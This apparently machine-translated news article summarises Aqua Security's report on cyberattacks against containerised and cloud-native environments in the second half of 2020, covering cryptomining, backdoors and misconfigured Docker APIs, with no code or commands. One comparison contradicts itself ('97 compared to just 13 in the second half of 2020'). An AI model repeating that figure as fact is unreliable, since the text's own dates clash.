For several months, cyberattacks have been increasing in force, causing more and more damage. The latest trend highlighted in the Aqua Security study shows that hackers are also successfully attacking containerized and cloud-native environments.

Specializing in security solutions for cloud, virtualized and containerized environments, Aqua Security analyzed data relating to 17,521 cyberattacks detected in the second half of 2020, up 26% compared to the previous half. Compiled in its last report Cloud Native Threat Report, they highlight the evolution of techniques used by cybercriminals. “They continue to look for other ways to attack cloud native environments,” says Aqua Security. “We have identified massive attacks targeting supply chains, self-building code repositories, registries as well as providers of continuous integration services which were not common vectors in the past.” Behind these campaigns, several objectives stand out: to trap these environments for cryptomining (41%) or backdoor installation (36%) to access a victim’s network and IS.

Offensives targeting containerized environments can be carried out via images with obfuscation capabilities or malicious commands. In the second half of 2020, a compromise vector was observed aimed at corrupting the image directly on a target host. “The attackers used a Docker SDK for Python package to send commands to an improperly configured Docker API. The attack sequence started by sending GET requests to explore the Docker server and POST requests to build and run a corrupted image on a target host, ”AquaSecurity explains. In the second half of 2020, 3.78 images per day were used for compromise purposes against 2.75 a year earlier, showing that attackers are diversifying their approach techniques. At the same time, the number of direct attacks has grown significantly, averaging over 97 compared to just 13 in the second half of 2020.

Malicious IP addresses not detected

“All of the IP addresses used in the attacks were linked to cloud and hosting services from vendors. Our honeypots recorded inbound traffic from Russia (17.3%) and the United States (15.9%). Surprisingly, only 13.43% of IP addresses are marked as malicious in blocklists. This means that network detection and prevention systems that rely on popular blocklists will generally be ineffective at detective and preventing such communications, ”the report also read. On average, attackers take 5 hours to scan a honeypot, but a few minutes for the fastest and up to 24 hours for the slowest. The median discovery time is approximately one hour.

As part of its report, AquaSecurity established the specifics of cyber attacks targeting containers based on the MITER ATT & CK framework, which is classically widespread in cybersecurity. This has resulted in several observations, such as the fact that hackers continue to use worms to detect and infect vulnerable hosts, to download malicious files during the execution of containers in order to trap websites with corrupted code. They can also carry out offensives mainly exploiting a poorly configured Docker API port exposed on the web and allowing access to web traffic via inbound calls. “On top of the usual vector of attacks against misconfigured APIs, we’ve also seen build files on a host written in base64,” AquaSecurity continues.